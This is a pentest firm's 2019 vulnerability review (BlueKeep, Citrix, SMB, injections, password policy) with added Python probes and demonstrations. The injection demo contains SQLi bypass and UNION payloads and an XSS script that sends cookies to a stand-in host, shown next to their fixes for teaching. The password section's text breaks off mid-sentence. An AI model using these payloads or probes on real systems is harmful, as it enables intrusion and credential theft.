TOP 5 vulnerabilities detected during our penetration tests in 2019

The goal of this report is to review the vulnerabilities most often encountered during the past year and to outline a trend for 2020.

It is therefore based on our own findings, and gives an overview of the five vulnerabilities most often encountered on our customers' infrastructure and applications.

Many critical vulnerabilities are of course absent from this report, either because we still rarely encounter them, because they affect core components that are generally well secured, or because they concern platforms not widely deployed at our customers (AWS, Azure, Salesforce, OpenStack, ...); they nevertheless open interesting perspectives for the coming year.

We hope this information sharing is useful to you.


Vulnerability #1: BlueKeep (CVE-2019-0708)


This vulnerability, made public in May 2019, still affects several thousand machines today. It impacts the RDP (Remote Desktop Protocol) service of older Windows versions that are nevertheless still in use in many companies (Windows 7, Windows Server 2008 and 2008 R2, Windows Server 2003, ...). The flaw is reachable before authentication, which is why it carries a CVSS v2 score of 10.0 (9.8 in CVSS v3): an exposed RDP endpoint on an unpatched system can be compromised without any credentials, and many administrators still connect to corporate infrastructure over RDP on exactly these deprecated versions. A working exploit module has been available in the Metasploit framework since September 2019, which makes exploitation trivial. Yet the patches provided by Microsoft are not applied systematically, whether through ignorance of the vulnerability itself or of which versions are actually deployed on the infrastructure. Enabling Network Level Authentication (NLA) forces authentication before the vulnerable code path is reached and is a reasonable stopgap, but only patching, or removing RDP exposure altogether, actually closes the hole.
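The check a pentester wants at this point is whether an exposed RDP endpoint at least enforces NLA, which keeps the pre-authentication code path out of reach of anonymous clients. The following Python probe is an added example, not tooling from the original report: it sends an X.224 Connection Request that offers only legacy "standard RDP security" (requestedProtocols = 0) and interprets the server's RDP_NEG_RSP or RDP_NEG_FAILURE. The sample responses at the bottom are constructed by hand, not captured from real hosts. Note what the probe does not tell you: a host that enforces NLA is still unpatched until the May 2019 update is installed, and remains exploitable by anyone holding valid credentials.

```python
import socket
import struct

# requestedProtocols flags of RDP_NEG_REQ (MS-RDPBCGR 2.2.1.1.1)
PROTOCOL_RDP = 0x00000000     # legacy "standard RDP security": no TLS, no NLA
PROTOCOL_SSL = 0x00000001
PROTOCOL_HYBRID = 0x00000002  # CredSSP, i.e. NLA

# failureCode values of RDP_NEG_FAILURE (MS-RDPBCGR 2.2.1.2.2)
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols=PROTOCOL_RDP):
    """TPKT + X.224 Connection Request carrying an RDP_NEG_REQ (no cookie)."""
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)
    # CR TPDU: code 0xE0, DST-REF, SRC-REF, class 0, then the negotiation request
    tpdu = bytes([0xE0, 0, 0, 0, 0, 0]) + neg_req
    tpdu = bytes([len(tpdu)]) + tpdu            # X.224 length indicator
    return struct.pack(">BBH", 3, 0, 4 + len(tpdu)) + tpdu


def parse_connection_confirm(data):
    """Interpret the server's X.224 Connection Confirm to a PROTOCOL_RDP-only request."""
    if len(data) < 11 or data[0] != 3 or (data[5] & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    tpkt_len = struct.unpack(">H", data[2:4])[0]
    if tpkt_len == 11 or data[4] == 6:
        # No rdpNegData at all: the server predates protocol negotiation
        # (Windows Server 2003 class); only standard RDP security is possible.
        return {"nla_enforced": False, "negotiation": False,
                "detail": "no RDP_NEG_RSP; standard RDP security only"}
    if len(data) < 19:
        raise ValueError("truncated rdpNegData")
    neg_type, _flags, _length, value = struct.unpack("<BBHI", data[11:19])
    if neg_type == 0x02:    # RDP_NEG_RSP: server accepted what we offered
        return {"nla_enforced": False, "negotiation": True,
                "detail": "server accepted PROTOCOL_RDP (selectedProtocol=%d); NLA not enforced" % value}
    if neg_type == 0x03:    # RDP_NEG_FAILURE: server refused; the code says why
        return {"nla_enforced": value == 5, "negotiation": True,
                "detail": "RDP_NEG_FAILURE: " + FAILURE_CODES.get(value, "code %d" % value)}
    raise ValueError("unknown rdpNegData type 0x%02x" % neg_type)


def check_rdp_nla(host, port=3389, timeout=5.0):
    """Offer only legacy RDP security and see whether the server insists on NLA."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request(PROTOCOL_RDP))
        return parse_connection_confirm(s.recv(64))


# Constructed sample responses (not captured from any real system) for offline use.
SAMPLE_NLA_REQUIRED = bytes.fromhex("030000130ed00000123400" "0300080005000000")
SAMPLE_LEGACY_ACCEPTED = bytes.fromhex("030000130ed00000123400" "0200080000000000")
SAMPLE_NO_NEGOTIATION = bytes.fromhex("0300000b06d00000123400")

if __name__ == "__main__":
    for name, sample in (("NLA required", SAMPLE_NLA_REQUIRED),
                         ("legacy accepted", SAMPLE_LEGACY_ACCEPTED),
                         ("no negotiation", SAMPLE_NO_NEGOTIATION)):
        print(name, "->", parse_connection_confirm(sample))
```

Run `check_rdp_nla("host")` only against systems you are authorised to test. A `HYBRID_REQUIRED_BY_SERVER` failure means NLA is enforced; `SSL_REQUIRED_BY_SERVER` means TLS is required but NLA is not; an RDP_NEG_RSP selecting protocol 0, or a confirm with no negotiation data at all, means anonymous clients reach the pre-authentication code path and the host must be patched or taken off the network immediately.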


Vulnerability #2: Citrix, a privilege issue


This vulnerability, which affects Citrix AppDNA up to a certain version, allows remote code execution (RCE), which in turn opens the way to an elevation of privilege. Citrix portals are used by many companies to give access to various resources, often exposed on the Web (Virtual Apps and Desktops). Since this vulnerability gives access to applications used, for example, in migration and deployment projects, an elevation of privilege on production systems would have serious consequences. Beyond integrating security into projects, active monitoring coupled with regular audits (more than once a year) of critical assets can prove an effective response.


Vulnerability #3: SMB, over and over again

In many companies, bad practices persist, such as running a deprecated protocol version that is vulnerable to numerous attacks (SMBv1), or not enforcing SMB signing, which enables privilege-escalation scenarios inside the information system (captured NTLM authentication can be relayed to any server that does not require signing). WannaCry owes it a great deal.

This observation points to a much larger problem: systems deployed on the infrastructure with their default configuration, without any hardening process. Default accounts, unused services left open, deprecated protocols enabled by default, or the possibility of downgrading certain services to weaker versions, are so many open doors left to curious or disgruntled employees, and to attackers coming from the Web. Once again, this is a reality that production and security teams find hard to accept: these deprecated protocols are sometimes necessary for obsolete systems, but more often the cause is IT departments working in silos, not communicating efficiently, and having no plan to harden their networks and systems in their action plans.
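Both findings in this section can be verified from the network without credentials. The following Python is an added example, not tooling from the original report: it sends a bare SMB1 NEGOTIATE (offering only the NT LM 0.12 dialect) and an SMB2 NEGOTIATE to a host and reads the SecurityMode flags of each response, the same check that nmap's smb-security-mode and smb2-security-mode scripts perform. The sample responses at the bottom are constructed so the parsers run offline; a real SMBv1-disabled Windows server simply closes the connection on the SMB1 probe.

```python
import socket
import struct
import uuid

SMB2_DIALECTS = [0x0202, 0x0210, 0x0300, 0x0302]  # SMB 2.0.2 to 3.0.2; 3.1.1 needs negotiate contexts
SMB1_DIALECT = b"\x02NT LM 0.12\x00"


def netbios(payload):
    """NetBIOS Session Service framing: type 0x00 + 3-byte big-endian length."""
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def exchange(host, port, payload, timeout=5.0):
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        return s.recv(4096)   # a single negotiate response fits in one read


def smb2_header(command=0, flags=0):
    # MS-SMB2 2.2.1: ProtocolId, StructureSize 64, CreditCharge, Status, Command, Credits,
    # Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, then a 16-byte Signature
    return b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, command, 1, flags, 0, 0, 0, 0, 0) + b"\x00" * 16


def build_smb2_negotiate():
    """SMB2 NEGOTIATE (MS-SMB2 2.2.3); the client says signing is enabled but not required."""
    body = struct.pack("<HHHHI16s8s", 36, len(SMB2_DIALECTS), 0x0001, 0, 0, uuid.uuid4().bytes, b"\x00" * 8)
    body += struct.pack("<%dH" % len(SMB2_DIALECTS), *SMB2_DIALECTS)
    return netbios(smb2_header() + body)


def parse_smb2_negotiate_response(data):
    """SecurityMode of the NEGOTIATE response (MS-SMB2 2.2.4): 0x01 enabled, 0x02 required."""
    smb = data[4:]
    if smb[:4] != b"\xfeSMB" or len(smb) < 70:
        raise ValueError("not an SMB2 negotiate response")
    status, command = struct.unpack("<IH", smb[8:14])
    if command != 0 or status != 0:
        raise ValueError("negotiate failed: command=%d status=0x%08x" % (command, status))
    _size, security_mode, dialect = struct.unpack("<HHH", smb[64:70])
    return {"dialect": "0x%04x" % dialect,
            "signing_enabled": bool(security_mode & 0x01),
            "signing_required": bool(security_mode & 0x02)}


def build_smb1_negotiate():
    """SMB1 NEGOTIATE offering only NT LM 0.12; a server with SMBv1 disabled will not answer."""
    # MS-CIFS 2.2.3.1 header: Protocol, Command 0x72, Status, Flags, Flags2, PIDHigh,
    # SecurityFeatures(8), Reserved(2), TID, PIDLow, UID, MID
    header = (b"\xffSMB" + struct.pack("<BIBHH", 0x72, 0, 0x18, 0xC843, 0)
              + b"\x00" * 10 + struct.pack("<HHHH", 0, 0xFEFF, 0, 0))
    body = struct.pack("<BH", 0, len(SMB1_DIALECT)) + SMB1_DIALECT   # WordCount 0, ByteCount
    return netbios(header + body)


def parse_smb1_negotiate_response(data):
    """SecurityMode byte of the SMB1 NEGOTIATE response (MS-CIFS 2.2.4.52.2)."""
    smb = data[4:]
    if smb[:4] != b"\xffSMB" or len(smb) < 36 or smb[32] != 17:
        raise ValueError("not an NT LM 0.12 negotiate response")
    dialect_index, security_mode = struct.unpack("<HB", smb[33:36])
    if dialect_index == 0xFFFF:
        raise ValueError("server accepted none of the offered SMB1 dialects")
    return {"signing_enabled": bool(security_mode & 0x04),
            "signing_required": bool(security_mode & 0x08)}


def probe_smb(host, port=445, timeout=5.0):
    """Live check of one host: is SMBv1 offered, and is signing required on SMB2?"""
    result = {"smb1_offered": False, "smb1": None, "smb2": None}
    try:
        data = exchange(host, port, build_smb1_negotiate(), timeout)
        if data[4:8] == b"\xffSMB":
            result["smb1_offered"] = True
            result["smb1"] = parse_smb1_negotiate_response(data)
    except (OSError, ValueError):
        pass   # reset or empty reply: SMBv1 is not offered
    result["smb2"] = parse_smb2_negotiate_response(exchange(host, port, build_smb2_negotiate(), timeout))
    return result


def findings(result):
    """Map a probe result to the two audit findings discussed in this section."""
    issues = []
    if result["smb1_offered"]:
        issues.append("SMBv1 offered (deprecated; EternalBlue/WannaCry attack surface)")
    if result["smb2"] and not result["smb2"]["signing_required"]:
        issues.append("SMB signing not required (NTLM relay to this host possible)")
    return issues


# Constructed sample responses (not captured from real hosts) so the parsers run offline.
def sample_smb2_response(security_mode):
    body = struct.pack("<HHHH", 65, security_mode, 0x0302, 0) + b"\x00" * 56
    return netbios(smb2_header(command=0, flags=0x01) + body)   # flags 0x01 = SERVER_TO_REDIR


SAMPLE_SMB1_RESPONSE = netbios(
    b"\xffSMB" + struct.pack("<BIBHH", 0x72, 0, 0x98, 0xC843, 0) + b"\x00" * 10
    + struct.pack("<HHHH", 0, 0xFEFF, 0, 0)
    + struct.pack("<BHB", 17, 0, 0x07) + b"\x00" * 31 + struct.pack("<H", 0))

if __name__ == "__main__":
    demo = {"smb1_offered": True, "smb1": parse_smb1_negotiate_response(SAMPLE_SMB1_RESPONSE),
            "smb2": parse_smb2_negotiate_response(sample_smb2_response(0x0001))}
    print(findings(demo))
```

On the remediation side, on Windows Server 2012 and later the two settings are one command away: `Set-SmbServerConfiguration -EnableSMB1Protocol $false -RequireSecuritySignature $true` (or, by GPO, "Microsoft network server: Digitally sign communications (always)" and removal of the SMB1Protocol feature). Expect a workstation-class host to report signing enabled but not required, since only domain controllers require it by default.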


Vulnerability #4: Injections (XXE, XSS, SQLi), in great shape again this year

Whether it is XML entities or characters interpreted by the application, injections were encountered many times in the past year. Secure development activities are still not carried out as they should be. Despite good-practice standards (OWASP) and code-analysis tools, the shortcomings inherent to this activity persist. Whether the causes are technical (we do not know how to code securely), organisational (DevSecOps, we will see about it later) or cultural (security bothers me and wastes my time), these vulnerabilities will keep being encountered for a long time. The OWASP Top 10 will not change much in the years to come.

Even if CMSs (content management systems) such as Drupal or WordPress greatly facilitate development and come with well-developed security features, this does not prevent these critical vulnerabilities from slipping through development cycle after development cycle and ending up in production. Whether for SMEs, mid-caps or large groups, and whatever the project approach, methodology or toolchain, maturity in secure development remains mostly low, and these vulnerabilities will not disappear in the near future.
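The two injection classes we see most, SQLi and XSS, come down to the same mistake: untrusted text is handed to an interpreter (the SQL engine, the browser's HTML parser) as code rather than as data. The following is an added example, not code from the original report or from any CMS, written against Python's standard-library sqlite3 and html modules; the users table, hashes and attacker payloads are constructed. It shows the vulnerable pattern next to its fix for each class, and why the fix works: a bound parameter is never parsed as SQL, and an HTML-escaped string is never parsed as markup.

```python
import html
import sqlite3

# Constructed sample rows (placeholder hashes, not real credentials)
SAMPLE_USERS = [
    ("alice", "hash-of-alice-secret", "admin"),
    ("bob", "hash-of-bob-secret", "user"),
    ("carol", "hash-of-carol-secret", "user"),
]

# Constructed attacker inputs
SQLI_BYPASS = "' OR '1'='1"
SQLI_UNION = "' UNION SELECT username, password_hash FROM users--"
XSS_PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def make_db():
    """In-memory users table seeded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, username):
    """Vulnerable: untrusted input is spliced into the SQL text, so quotes end the literal."""
    query = "SELECT username, role FROM users WHERE username = '%s'" % username
    return conn.execute(query).fetchall()


def find_user_safe(conn, username):
    """Fixed: a bound parameter is passed to the engine as a value, never parsed as SQL."""
    return conn.execute("SELECT username, role FROM users WHERE username = ?", (username,)).fetchall()


def render_greeting_vulnerable(display_name):
    """Vulnerable: user-controlled text written into the page as-is (reflected or stored XSS)."""
    return "<p>Welcome back, %s</p>" % display_name


def render_greeting_safe(display_name):
    """Fixed: output encoding for the HTML text-node context; quote=True also covers attributes."""
    return "<p>Welcome back, %s</p>" % html.escape(display_name, quote=True)


def demo():
    """Run every variant once and return the observable differences."""
    conn = make_db()
    return {
        "bypass_rows_vulnerable": len(find_user_vulnerable(conn, SQLI_BYPASS)),   # every user
        "bypass_rows_safe": len(find_user_safe(conn, SQLI_BYPASS)),              # no such username
        "union_rows_vulnerable": find_user_vulnerable(conn, SQLI_UNION),         # leaks password hashes
        "union_rows_safe": find_user_safe(conn, SQLI_UNION),
        "xss_vulnerable": render_greeting_vulnerable(XSS_PAYLOAD),
        "xss_safe": render_greeting_safe(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The UNION payload is the reason this class stays critical: a single unparameterised lookup lets the attacker read columns the query never meant to expose. For XML (XXE), the equivalent fix is configuration rather than encoding: disable DTD processing and external entity resolution in the parser (in Python, use the defusedxml package rather than the stock parsers).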


Vulnerability #5: Password policy


An unavoidable vulnerability, still present in the 2019 assessment and with a bright future ahead of it, is the weakness of password policies and the bad practices that come with them. Whether it is the very low awareness of employees, abusive exceptions, default accounts (including service accounts),
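What a policy audit actually has to catch is not "fewer than eight characters" but the habits listed in this section: season-plus-year passwords, the company name with a digit, vendor defaults left on service accounts, and the same password reused across accounts. The following Python checker is an added example, not the report's own tooling; the deny-list, default-credential table and the audited accounts are all constructed, and a real audit would use a breach-derived wordlist and the product defaults actually in scope.

```python
import re
from collections import defaultdict

# Constructed, deliberately short deny-list; a real audit uses a breach-derived wordlist.
COMMON_PASSWORDS = {"password", "welcome", "admin", "letmein", "qwerty", "azerty", "changeme", "secret"}
# Well-known vendor defaults as (username, password); extend from the products in scope.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("administrator", "password"), ("root", "root"),
                       ("sa", ""), ("tomcat", "tomcat")}
LEET = str.maketrans("013457@$", "oieastas")
SEASON_YEAR = re.compile(r"(spring|summer|autumn|fall|winter|january|february|march|april|may|june|"
                         r"july|august|september|october|november|december)[^a-z]*(19|20)?\d{2}")
SUFFIX_CHARS = "0123456789!?.*#_-"
MIN_LENGTH = 12


def deleet(password):
    """Undo the substitutions users make to satisfy complexity rules (P@ssw0rd -> password)."""
    return password.lower().translate(LEET)


def check_password(password, username="", context_words=()):
    """Return the policy violations for one password; an empty list means it passed."""
    issues = []
    if len(password) < MIN_LENGTH:
        issues.append("shorter than %d characters" % MIN_LENGTH)
    classes = sum(bool(re.search(p, password)) for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))
    if classes < 3:
        issues.append("fewer than 3 character classes")
    # Strip the trailing "123!" first, then normalise: "P@ssw0rd123" -> "password"
    if deleet(password.rstrip(SUFFIX_CHARS)) in COMMON_PASSWORDS:
        issues.append("common password with trivial suffix")
    plain = deleet(password)
    if username and len(username) >= 3 and username.lower() in plain:
        issues.append("contains the username")
    for word in context_words:          # company name, product, site: "Acm3-2019"
        if word.lower() in plain:
            issues.append("contains context word %r" % word)
    if SEASON_YEAR.search(password.lower()):
        issues.append("season/month + year pattern")
    return issues


def audit(accounts, context_words=()):
    """Audit (username, password) pairs: per-account violations plus defaults and reuse."""
    report = {user: check_password(pwd, user, context_words) for user, pwd in accounts}
    by_password = defaultdict(list)
    for user, pwd in accounts:
        by_password[pwd].append(user)
        if (user.lower(), pwd) in DEFAULT_CREDENTIALS:
            report[user].append("vendor default credentials")
    for users in by_password.values():
        if len(users) > 1:              # one compromised account unlocks the others
            for user in users:
                report[user].append("password shared with: " + ", ".join(u for u in users if u != user))
    return report


# Constructed sample accounts for a fictional company "Acme" (no real users or secrets)
CONTEXT_WORDS = ("acme",)
SAMPLE_ACCOUNTS = [
    ("j.dupont", "Summer2019!"),
    ("it_admin", "Summer2019!"),
    ("svc_backup", "svc_backup"),
    ("admin", "admin"),
    ("svc_sql", "Acm3-2019"),
    ("m.martin", "C0rrect-Horse-Battery-Staple-42"),
]

if __name__ == "__main__":
    for user, issues in audit(SAMPLE_ACCOUNTS, CONTEXT_WORDS).items():
        print("%-12s %s" % (user, "; ".join(issues) or "OK"))
```

In a domain audit the input would be the output of an offline password-hash crack rather than clear-text passwords, which is exactly the point: every entry the checker flags is one that a dictionary with a few rules would have cracked, whatever the length and complexity settings of the domain policy say.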
